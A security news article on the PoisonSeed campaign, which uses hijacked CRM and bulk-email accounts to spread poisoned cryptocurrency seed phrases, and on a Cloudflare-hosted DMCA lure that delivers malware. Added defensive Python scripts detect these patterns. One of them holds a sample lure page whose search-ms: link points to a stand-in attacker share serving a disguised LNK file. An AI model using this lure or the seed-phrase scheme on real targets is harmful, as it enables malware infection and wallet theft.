A malicious campaign called PoisonSeed is using compromised credentials associated with customer relationship management (CRM) tools & bulk email providers to send spam messages containing cryptocurrency seed phrases in an attempt to steal from victims’ digital wallets.
“Recipients of the bulk spam are targeted with a cryptocurrency seed phrase poisoning attack,” Silent Push said in an analysis. “As part of the attack, PoisonSeed provides security seed phrases to get potential victims to copy & paste them into new cryptocurrency wallets for future compromising.”
Targets
Targets of PoisonSeed include enterprise organisations & individuals outside the cryptocurrency industry. Crypto companies like Coinbase & Ledger, & bulk email providers such as Mailchimp, SendGrid, Hubspot, Mailgun, & Zoho are among the targeted companies.
The activity is believed to be distinct from 2 loosely aligned threat actors Scattered Spider & CryptoChameleon, which are both part of a broader cybercrime group called The Com. Some aspects of the campaign were previously disclosed by security researcher Troy Hunt & Bleeping Computer last month.
‘Lookalike’
The attacks involve the threat actors setting up ‘lookalike’ phishing pages for prominent CRM & bulk email companies, aiming to trick high-value targets into entering their credentials.
Once the credentials are obtained, the adversaries proceed to create an API key to ensure persistence even if the stolen password is reset by its owner.
Next, the operators export the compromised accounts’ mailing lists, likely using an automated tool, & send spam from those accounts. These post-CRM-compromise supply chain spam messages tell recipients that they need to set up a new Coinbase Wallet using the seed phrase embedded in the email.
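As an added illustration of the post-compromise chain described above (example code, not from the Silent Push analysis), the following Python flags, in a constructed CRM audit log, a login from a never-before-seen IP that is followed within a short window by an API key created from that IP and then an audience export or bulk send authenticated with that key. It separately lists keys still in use after the account password was reset, which is the persistence the attackers rely on. The event names, field names and log entries are assumptions for the demo; a real vendor audit log needs a mapping step onto this shape.

```python
"""Detection sketch for the PoisonSeed post-compromise chain in a CRM /
bulk-email audit log: login from a new IP -> API key created from that IP ->
audience export / bulk send with the key, plus keys that outlive a password reset.
Event names and fields are assumptions for this example, not a vendor's schema."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed audit events: (timestamp, account, action, details). Not real log data.
SAMPLE_EVENTS = [
    ("2025-03-20T09:00:00", "marketing@example.com", "login", {"ip": "203.0.113.7"}),
    ("2025-03-21T09:02:00", "marketing@example.com", "login", {"ip": "203.0.113.7"}),
    ("2025-03-22T23:14:00", "marketing@example.com", "login", {"ip": "198.51.100.42"}),
    ("2025-03-22T23:16:00", "marketing@example.com", "api_key.create", {"ip": "198.51.100.42", "key_id": "k-91"}),
    ("2025-03-22T23:20:00", "marketing@example.com", "audience.export", {"ip": "198.51.100.42", "key_id": "k-91"}),
    ("2025-03-22T23:31:00", "marketing@example.com", "campaign.send", {"ip": "198.51.100.42", "key_id": "k-91", "recipients": 48210}),
    ("2025-03-23T08:05:00", "marketing@example.com", "password.reset", {"ip": "203.0.113.7"}),
    ("2025-03-23T08:40:00", "marketing@example.com", "campaign.send", {"ip": "198.51.100.42", "key_id": "k-91", "recipients": 12000}),
    # Benign: a key created from an IP the account has used before, with no export or send after it.
    ("2025-03-19T09:50:00", "ops@example.com", "login", {"ip": "203.0.113.9"}),
    ("2025-03-23T10:00:00", "ops@example.com", "login", {"ip": "203.0.113.9"}),
    ("2025-03-23T10:05:00", "ops@example.com", "api_key.create", {"ip": "203.0.113.9", "key_id": "k-92"}),
]


def parse_events(raw):
    """Normalise the constructed tuples into dicts, sorted by timestamp."""
    events = [{"ts": datetime.fromisoformat(ts), "account": acct, "action": action, **details}
              for ts, acct, action, details in raw]
    return sorted(events, key=lambda e: e["ts"])


def find_poisonseed_chain(raw, window=timedelta(hours=2)):
    """One finding per login from a new IP that is followed, within `window`, by an
    API key created from that IP and then an export or bulk send using that key."""
    events = parse_events(raw)
    seen_ips = defaultdict(set)  # account -> IPs seen on earlier logins
    findings = []
    for i, ev in enumerate(events):
        if ev["action"] != "login":
            continue
        acct, ip = ev["account"], ev["ip"]
        # The very first login has no history to compare against; treat it as baseline.
        new_ip = bool(seen_ips[acct]) and ip not in seen_ips[acct]
        seen_ips[acct].add(ip)
        if not new_ip:
            continue
        deadline = ev["ts"] + window
        follow = [e for e in events[i + 1:] if e["account"] == acct and e["ts"] <= deadline]
        key_ids = {e["key_id"] for e in follow
                   if e["action"] == "api_key.create" and e.get("ip") == ip}
        abuse = [e for e in follow
                 if e["action"] in ("audience.export", "campaign.send") and e.get("key_id") in key_ids]
        if key_ids and abuse:
            findings.append({"account": acct, "ip": ip, "key_ids": sorted(key_ids),
                             "actions": [e["action"] for e in abuse], "login_at": ev["ts"]})
    return findings


def keys_surviving_reset(raw):
    """(account, key_id) pairs still used after a password reset: resetting the
    password does not revoke API keys, which is exactly the persistence the
    operators set up."""
    events = parse_events(raw)
    reset_at, survivors = {}, set()
    for e in events:
        if e["action"] == "password.reset":
            reset_at[e["account"]] = e["ts"]
        elif "key_id" in e and e["action"] != "api_key.create" \
                and e["account"] in reset_at and e["ts"] > reset_at[e["account"]]:
            survivors.add((e["account"], e["key_id"]))
    return survivors


if __name__ == "__main__":
    for f in find_poisonseed_chain(SAMPLE_EVENTS):
        print("chain:", f["account"], f["ip"], f["key_ids"], f["actions"])
    for acct, key in sorted(keys_surviving_reset(SAMPLE_EVENTS)):
        print("key still active after reset:", acct, key)
```

The second check is the one worth wiring into the incident-response runbook: after a credential reset on a CRM or bulk-mail account, enumerate & revoke every API key the account holds, not only the ones created from the suspicious IP, because the stolen password is no longer the attacker's way in.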
Hijack the Accounts
The goal of the attacks is to use the same recovery phrase to hijack the accounts & transfer funds from those wallets. Because the attackers already hold the seed phrase, any wallet a victim creates from it is under their control from the moment it is funded.
The suspected links to Scattered Spider & CryptoChameleon stem from the use of a domain (“mailchimp-sso[.]com”) that has previously been identified as used by the former, as well as CryptoChameleon’s historical targeting of Coinbase & Ledger.
Russian-Speaking
In addition, the phishing kit used by PoisonSeed does not share any similarity with those used by the other 2 threat clusters, which suggests that it’s either a brand new phishing kit from CryptoChameleon or a different threat actor that happens to overlap with them in infrastructure & targets.
This comes as a Russian-speaking threat actor has been observed using phishing pages hosted on Cloudflare’s pages.dev & workers.dev to deliver malware that can remotely control infected Windows hosts. A previous iteration of the campaign also distributed the StealC information stealer.
Cloudflare
“This recent campaign leverages Cloudflare-branded phishing pages themed around DMCA (Digital Millennium Copyright Act) takedown notices served across multiple domains,” Hunt.io said.
“The lure abuses the ms-search protocol to download a malicious LNK file disguised as a PDF via a double extension. Once executed, the malware checks in with an attacker-operated Telegram bot, sending the victim’s IP address, before transitioning to Pyramid C2 to control the infected host.”
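As an added example (not code from Hunt.io or from the campaign), the following Python shows what a mail or web gateway check for this lure pattern looks like. It extracts `search-ms:` URIs (the Windows Search protocol handler the quote refers to as ms-search) from a constructed HTML page, decodes the `crumb=location:` parameter to see whether it points at a remote UNC/WebDAV share rather than a local folder, and flags filenames that hide a `.lnk` behind a document extension. The sample page, share listing, hostnames and the list of document extensions are constructed for the demo.

```python
"""Gateway check for the DMCA-notice lure pattern: a page that launches the
Windows Search handler (search-ms:) against an attacker share, and LNK files
disguised as documents via a double extension. Sample data is constructed."""
import re
from urllib.parse import unquote

# Constructed lure page (not a sample from the campaign). The href form is
# percent-encoded; the script form writes the UNC path literally.
SAMPLE_LURE = r'''<html><body>
<h2>DMCA Takedown Notice</h2>
<p>Review the attached notice within 24 hours.</p>
<a href="search-ms:query=DMCA_Notice&crumb=location:%5C%5C198.51.100.23%40SSL%5CDavWWWRoot%5Cdocs&displayname=Downloads">Open notice</a>
<script>window.location.href = "search-ms:query=DMCA_Notice&crumb=location:\\198.51.100.23@SSL\DavWWWRoot\docs&displayname=Downloads";</script>
<a href="https://example.com/help">Help</a>
</body></html>'''

# Constructed listing of what the attacker share would serve.
SAMPLE_FILES = ["DMCA_Notice.pdf.lnk", "DMCA_Notice.pdf", "readme.lnk", "Invoice.PDF.LNK", "notes.txt"]

# Extensions an attacker would hide a shortcut behind (assumed list for the demo).
DOC_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
SEARCH_URI = re.compile(r'''search-ms:[^"'<>\s]+''', re.IGNORECASE)


def parse_search_ms(uri):
    """Split a search-ms: URI into its parameters, decoding percent-encoding.
    'remote' is True when crumb=location: names a UNC path (\\host\share),
    i.e. Explorer will fetch the results from a server the attacker controls."""
    params = {}
    for part in unquote(uri.split(":", 1)[1]).split("&"):
        key, _, value = part.partition("=")
        params[key.lower()] = value
    crumb = params.get("crumb", "")
    location = crumb.split("location:", 1)[1] if "location:" in crumb else ""
    return {"query": params.get("query", ""), "location": location,
            "remote": location.startswith("\\\\")}


def find_search_ms_uris(html):
    """All search-ms: URIs in the page, wherever they sit (href, script, meta refresh)."""
    return [dict(uri=m.group(0), **parse_search_ms(m.group(0))) for m in SEARCH_URI.finditer(html)]


def is_double_extension_lnk(name):
    """True for 'Notice.pdf.lnk'-style names: a shortcut masquerading as a document."""
    parts = name.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[2] == "lnk" and parts[1] in DOC_EXTENSIONS


def scan(html, filenames):
    """Combine both signals into a verdict for the page plus the share it points at."""
    remote_uris = [u for u in find_search_ms_uris(html) if u["remote"]]
    disguised = [f for f in filenames if is_double_extension_lnk(f)]
    if remote_uris and disguised:
        verdict = "lure"
    elif remote_uris or disguised:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"remote_search_uris": remote_uris, "disguised_lnks": disguised, "verdict": verdict}


if __name__ == "__main__":
    result = scan(SAMPLE_LURE, SAMPLE_FILES)
    print(result["verdict"])
    for u in result["remote_search_uris"]:
        print("search-ms ->", u["location"])
    print("disguised LNKs:", result["disguised_lnks"])
```

The practical control on the endpoint side is to block outbound WebDAV (TCP 80/443 from the WebClient service to untrusted hosts) or unregister the search-ms: handler via policy where Windows Search over remote shares is not needed; the gateway check above only catches the page, not a victim who already clicked through.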